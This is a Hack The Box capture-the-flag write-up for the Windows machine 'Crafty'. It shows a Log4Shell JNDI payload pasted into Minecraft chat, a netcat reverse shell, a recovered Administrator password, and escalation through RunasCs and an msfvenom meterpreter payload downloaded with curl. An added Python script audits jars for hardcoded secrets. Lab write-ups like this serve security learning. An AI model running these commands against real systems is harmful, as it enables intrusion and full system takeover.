Crafty

Platform: Hack The Box

Category/Tags: Windows, CVE, Log4j

Difficulty: Easy

Recon

To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.

As usual, I start with an nmap scan. I scan all ports, which reveals an open port besides port 80.

nmap -sC -sV -p- -oN results.nmap crafty.htb
[screenshot: nmap results]

  • Open ports
    • Port 80 - http
    • Port 25565 - Minecraft server, version 1.16.5

This is the landing page, a design inspired by Minecraft.

[screenshot: landing page]

I did some web directory fuzzing for hidden directories, subdomain enumeration, and even searched for a Microsoft IIS 10.0 exploit, but had no luck. So I figured that play.crafty.htb is the Minecraft server and that this is where the exploration should happen.

Foothold

My wild guess is that this is a Log4j vulnerability; Minecraft was one of the services affected by that zero-day.

Log4Shell is a critical flaw found in the widely used Java-based logging library, Apache Log4j. Officially identified as CVE-2021-44228, it carries a severity score of 10 out of 10 (CVSS v3.1) from the Common Vulnerability Scoring System (CVSS). (From TrendMicro.)

I used TLauncher (make sure to use the exact version, 1.16.5) to join the server. I tried to send messages to other players, and it worked as usual (but the server is a bit crap). So I searched for a Log4j exploit, stumbled upon the repository log4j-shell-poc, and explored how it works. Before I begin, I change the cmd value in poc.py to "cmd".

To set up a listener,

nc -lnvp 9001

To launch the exploit,

python3 poc.py --userip <YOUR_IP> --webport 8000 --lport 9001

Now I get the output,

[screenshot: log4j exploit]

Copy the payload next to “Send me:” (this is the JNDI lookup string; when Log4j logs it, the lookup is resolved and can lead to RCE).

${jndi:ldap://<YOUR_IP>:1389/a}

Paste this into the chat,

[screenshot: minecraft chat]

Gotcha, we have a response,

[screenshot: log4j exploit response]

Now I check my Netcat listener, and I have the shell. The user flag is on the desktop.

[screenshot: user shell]

Privilege Escalation

This part was the hardest for me, because I tried various tools to gain Administrator privileges.

In C:\Users\svc_minecraft\server\plugins, I found a .jar file,

[screenshot: plugins directory]

I can’t decompile with a plain jar command, so I looked for the Java binaries on the box. I came across C:\Program Files\Java\jdk1.8.0_171\bin, where jar.exe and javap.exe let me look inside the jar file. To unpack the jar on the desktop,

"C:\Program Files\Java\jdk1.8.0_171\bin\jar.exe" xf c:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar

I also read all the class files with javap.exe and found a string, “s67u84zKq8IXw”, that might help gain administrator privileges.

"C:\Program Files\Java\jdk1.8.0_171\bin\javap.exe" -c c:\Users\svc_minecraft\Desktop\htb\crafty\playercounter\Playercounter.class
[screenshot: Playercounter.class]
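The javap step above works because a compiled class keeps every string literal in its constant pool. As an added example (not code from this box, the plugin, or the JDK), the following Python script reads that constant pool directly, so a server admin can audit third-party plugin jars for hardcoded credentials before deploying them, without needing a JDK on the host. The jar and class bytes it scans are hand-assembled for the demo, and the secret-looking literal "Xy7Placeholder9Q" is a made-up placeholder.

```python
"""Audit a plugin jar for hardcoded secrets by reading the constant pool of
each .class file, i.e. the same String literals javap shows.

Added example for this writeup, not code from the box, the plugin, or the JDK.
The jar and class bytes below are hand-assembled for the demo; the
secret-looking string "Xy7Placeholder9Q" is a made-up placeholder.
"""
import io
import re
import struct
import zipfile

# Body size in bytes of each fixed-size constant pool entry (JVM spec 4.4).
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 9: 4, 10: 4, 11: 4, 12: 4,
            15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
CP_UTF8, CP_LONG, CP_DOUBLE, CP_STRING = 1, 5, 6, 8


def constant_pool_strings(class_bytes):
    """Return the CONSTANT_String literals of one class, in pool order.

    Only the constant pool is parsed; everything after it is ignored, so a
    class file truncated after the pool (like the sample below) still works.
    """
    magic, _minor, _major, count = struct.unpack_from(">IHHH", class_bytes, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    off, idx = 10, 1
    utf8 = {}          # pool index -> decoded CONSTANT_Utf8 text
    string_refs = []   # Utf8 indices referenced by CONSTANT_String entries
    while idx < count:
        tag = class_bytes[off]
        off += 1
        if tag == CP_UTF8:
            (length,) = struct.unpack_from(">H", class_bytes, off)
            off += 2
            utf8[idx] = class_bytes[off:off + length].decode("utf-8", "replace")
            off += length
        elif tag == CP_STRING:
            (ref,) = struct.unpack_from(">H", class_bytes, off)
            off += 2
            string_refs.append(ref)
        else:
            off += CP_SIZES[tag]
        # Long and Double entries occupy two pool slots.
        idx += 2 if tag in (CP_LONG, CP_DOUBLE) else 1
    return [utf8[r] for r in string_refs if r in utf8]


SECRET_RE = re.compile(r"^[A-Za-z0-9]{10,}$")


def looks_like_secret(s):
    """Heuristic: a long, space-free token mixing digits, lower and upper
    case deserves a human look (the string found on this box would match)."""
    return (bool(SECRET_RE.match(s)) and any(c.isdigit() for c in s)
            and any(c.islower() for c in s) and any(c.isupper() for c in s))


def audit_jar(jar_bytes):
    """Return (class path, literal) pairs for every secret-looking String."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            if name.endswith(".class"):
                for s in constant_pool_strings(z.read(name)):
                    if looks_like_secret(s):
                        findings.append((name, s))
    return findings


def build_sample_class():
    """Hand-assemble a class file header plus constant pool (constructed)."""
    def utf8(s):
        return bytes([CP_UTF8]) + struct.pack(">H", len(s)) + s.encode()

    def sref(i):
        return bytes([CP_STRING]) + struct.pack(">H", i)

    pool = (utf8("Hello") + sref(1)                      # slots 1, 2
            + utf8("Xy7Placeholder9Q") + sref(3)        # slots 3, 4
            + utf8("java/lang/Object")                   # slot 5: class name, not a literal
            + bytes([CP_LONG]) + struct.pack(">q", 42)   # slots 6-7: Long takes two
            + utf8("plain text with spaces") + sref(8))  # slots 8, 9
    return struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 10) + pool


def build_sample_jar():
    """Wrap the sample class in a jar (constructed path and plugin.yml)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("example/Playercounter.class", build_sample_class())
        z.writestr("plugin.yml", "name: playercounter\n")
    return buf.getvalue()


if __name__ == "__main__":
    for path, literal in audit_jar(build_sample_jar()):
        print(f"{path}: possible hardcoded secret {literal!r}")
```

Only CONSTANT_String entries are reported, not every Utf8 entry, so class names, method descriptors and the like do not drown out real literals; a real audit would feed the plugins directory's jars into audit_jar and review each hit by hand.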

So I tried tools like evil-winrm, but again, no luck. Then someone on the forum gave a hint that we could use RunasCs, a utility that runs a command as another user with the credentials you supply. So I tried that, and opened an HTTP server to transfer RunasCs.exe to the machine.

python -m http.server 8000

On the remote machine, I download the file.

curl http://<YOUR_IP>:8000/RunasCs.exe -o runascs.exe

To check whether we can log in as Administrator with the string “s67u84zKq8IXw” as the password and execute commands,

runascs.exe Administrator s67u84zKq8IXw "cmd /c whoami /all"
[screenshot: runascs]

You can now read the root flag in Administrator/Desktop, but I want a shell with administrator privileges. In the forum, they also gave a hint that we could use Metasploit (which, as of yet, I don’t know how to use, but I am great at searching, so I proceed 😄).

I made a payload with msfvenom (part of Metasploit), set my listening address and port, and wrote it out as an exe file.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=1234 -f exe -o exp.exe

On the remote machine, I download the file.

curl http://<YOUR_IP>:8000/exp.exe -o exp.exe

And I started the reverse TCP handler in msfconsole to catch the connection and get the shell.

msfconsole

On the remote machine, I run runascs.exe to launch exp.exe, our payload, as Administrator and get the reverse shell with Administrator privileges.

runascs.exe Administrator s67u84zKq8IXw "cmd /c c:\Users\svc_minecraft\Desktop\exp.exe"

Here it is; I successfully got the shell.

[screenshot: root shell]

Mitigation

Update or patch the Log4j library to a version that includes the fix for the vulnerability.
